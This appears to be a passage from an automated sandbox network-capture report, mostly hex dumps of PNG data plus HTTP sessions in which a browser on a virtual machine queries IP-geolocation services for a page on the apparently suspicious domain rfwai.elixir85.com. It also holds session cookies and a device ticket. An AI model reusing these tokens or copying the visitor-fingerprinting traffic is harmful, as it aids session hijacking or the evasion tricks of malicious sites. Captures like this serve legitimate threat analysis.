                                                        2024-07-03 19:07:27 UTC1369INData Raw: 54 5a cb 92 1a 76 a2 cf bb a8 9a 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c
                                                        Data Ascii: TZv(Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 43 92 a4 6e 72 10 f1 f7 e2 5c 75 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6
                                                        Data Ascii: Cnr\uF3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LV
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 6d 6f e0 ef c0 59 c0 0a c1 59 24 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b
                                                        Data Ascii: moYY$I$I%_OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 70 05 18 a9 6e aa 76 4f d9 30 3a 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f
                                                        Data Ascii: pnvO0:JR?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8
                                                        2024-07-03 19:07:27 UTC1369INData Raw: b6 25 bd c8 1d 7d 5e e4 aa f7 e5 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2
                                                        Data Ascii: %}^ue&w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 5f 8b b6 0b 70 60 74 08 49 92 24 49 ea 06 bd a4 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9 37 88 fb 39 59 92 24 49 92 ba 46 15 b7 50 71 ff f3 18 07 90 f6 a0 af ba 47 81 6f 46 87 50 e9 8c 06 2e 07 ae 07 36 08 ce 02 ae c2 11 a9 6a f7 98 aa dd c3 35 df 3e c0 be d1 21 4a e6 3b a4 31 79 31 3a 88 38 9b b4 7d cd 0b d1 41 4a e4 84 e8 00 92 a4 c2 fd 9a d4 48 7a 73 70 8e b2 5a 1f 38 2a 3a 84 24 49 92 24 d5 9d 0d 1c 5a 1a 3d c0 49 d1 21 32 39 0a 98 16 1d 42 a5 d1 03 1c 0e 3c 08 1c 12 9c a5 af 0d 80 0f 46 87 e8 52 55 5b 81 a3 6a f7 70 25 3d c0 d7 a2 43 94 c8 2c
                                                        Data Ascii: _p`tI$I-%>o|lHX_eXWT5ajAgI=:H|L6!I*D79Y$IFPqGoFP.6j5>!J;1y1:8}AJHzspZ8*:$I$Z=I!29B<FRU[jp%=C,


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        92192.168.2.54982340.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:26 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4c 4b 4d 6f 53 64 75 75 4b 6b 71 30 41 56 6b 6e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 37 39 65 37 31 62 33 66 39 39 64 38 37 35 33 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: LKMoSduuKkq0AVkn.1Context: 879e71b3f99d8753
                                                        2024-07-03 19:07:26 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-07-03 19:07:26 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 4c 4b 4d 6f 53 64 75 75 4b 6b 71 30 41 56 6b 6e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 37 39 65 37 31 62 33 66 39 39 64 38 37 35 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 65 64 71 39 69 6b 77 4f 2b 42 6c 6f 57 32 4a 71 59 70 46 78 73 2f 43 74 57 6f 35 48 58 48 5a 6d 59 53 39 65 66 6e 56 2f 67 55 34 4d 33 73 4c 4d 6c 55 42 79 38 6d 2b 41 63 35 64 32 50 34 53 4b 66 38 4d 53 57 6f 2b 59 30 5a 55 57 41 48 56 4a 79 44 61 2f 76 5a 6b 61 55 52 44 6a 77 71 51 77 68 4c 42 78 44 61 34 34 49 77 6a
                                                        Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: LKMoSduuKkq0AVkn.2Context: 879e71b3f99d8753<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwedq9ikwO+BloW2JqYpFxs/CtWo5HXHZmYS9efnV/gU4M3sLMlUBy8m+Ac5d2P4SKf8MSWo+Y0ZUWAHVJyDa/vZkaURDjwqQwhLBxDa44Iwj
                                                        2024-07-03 19:07:26 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4c 4b 4d 6f 53 64 75 75 4b 6b 71 30 41 56 6b 6e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 37 39 65 37 31 62 33 66 39 39 64 38 37 35 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: LKMoSduuKkq0AVkn.3Context: 879e71b3f99d8753<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                        2024-07-03 19:07:26 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-07-03 19:07:26 UTC58INData Raw: 4d 53 2d 43 56 3a 20 52 5a 44 4d 7a 6f 59 31 74 6b 47 6c 31 63 4e 4a 49 4e 35 31 4b 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: RZDMzoY1tkGl1cNJIN51Kg.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        93192.168.2.549827172.67.69.2264433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:26 UTC559OUTGET /8.46.123.33/json/ HTTP/1.1
                                                        Host: ipapi.co
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://rfwai.elixir85.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:27 UTC726INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:26 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 763
                                                        Connection: close
                                                        Allow: OPTIONS, HEAD, OPTIONS, POST, GET
                                                        X-Frame-Options: DENY
                                                        Vary: Host, origin
                                                        access-control-allow-origin: https://rfwai.elixir85.com
                                                        X-Content-Type-Options: nosniff
                                                        Referrer-Policy: same-origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BXroT0gS4q%2FbgExfddr1qpCeFOTWVG9cOziKFfk%2Ba5%2FyBEoGaKTvDdpBzDdMDDF5PDqXAmsTJwzMdrSBJSIDR90rPXc7cqhf2xFs%2BvLN08%2Beg9iuLot%2B9NtO"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 89d92894df3f190e-EWR
                                                        2024-07-03 19:07:27 UTC643INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 4e 59 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e
                                                        Data Ascii: { "ip": "8.46.123.33", "network": "8.46.123.0/24", "version": "IPv4", "city": "New York City", "region": "New York", "region_code": "NY", "country": "US", "country_name": "United States", "country_code": "US", "coun
                                                        2024-07-03 19:07:27 UTC120INData Raw: 2c 68 61 77 2c 66 72 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 61 72 65 61 22 3a 20 39 36 32 39 30 39 31 2e 30 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 70 6f 70 75 6c 61 74 69 6f 6e 22 3a 20 33 32 37 31 36 37 34 33 34 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 33 33 35 36 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 4c 45 56 45 4c 33 22 0a 7d
                                                        Data Ascii: ,haw,fr", "country_area": 9629091.0, "country_population": 327167434, "asn": "AS3356", "org": "LEVEL3"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        94192.168.2.5498263.227.135.84433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:26 UTC337OUTGET /ip HTTP/1.1
                                                        Host: httpbin.org
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:27 UTC224INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:27 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 30
                                                        Connection: close
                                                        Server: gunicorn/19.9.0
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: true
                                                        2024-07-03 19:07:27 UTC30INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 0a 7d 0a
                                                        Data Ascii: { "origin": "8.46.123.33"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        95192.168.2.549829104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:27 UTC1141OUTGET /uvrkTtrGLzA9nOtO0uRNX2ukFXM6ttnWjIo6De4Rue8U5rkmnqqgYjP3dvGgTUnVi3jY1Cegh254 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:28 UTC680INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:28 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 70712
                                                        Connection: close
                                                        Content-Disposition: inline; filename="uvrkTtrGLzA9nOtO0uRNX2ukFXM6ttnWjIo6De4Rue8U5rkmnqqgYjP3dvGgTUnVi3jY1Cegh254"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fJLqGBSa3FkswmLN9bCexSRo%2FOCeeyUYPrtX20YljbJIejETBET5PKRKjJ17QWr%2BwEH2zHT3SgVm%2F%2F6z%2FYA3HJoaL8b6Hd59RRiuB%2BB1aNQl5EAEER7Y%2FPKe1F%2Bgdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d92898fd5d03d5-EWR
                                                        2024-07-03 19:07:28 UTC689INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                        Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:28 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:28 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:28 UTC1369INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:28 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
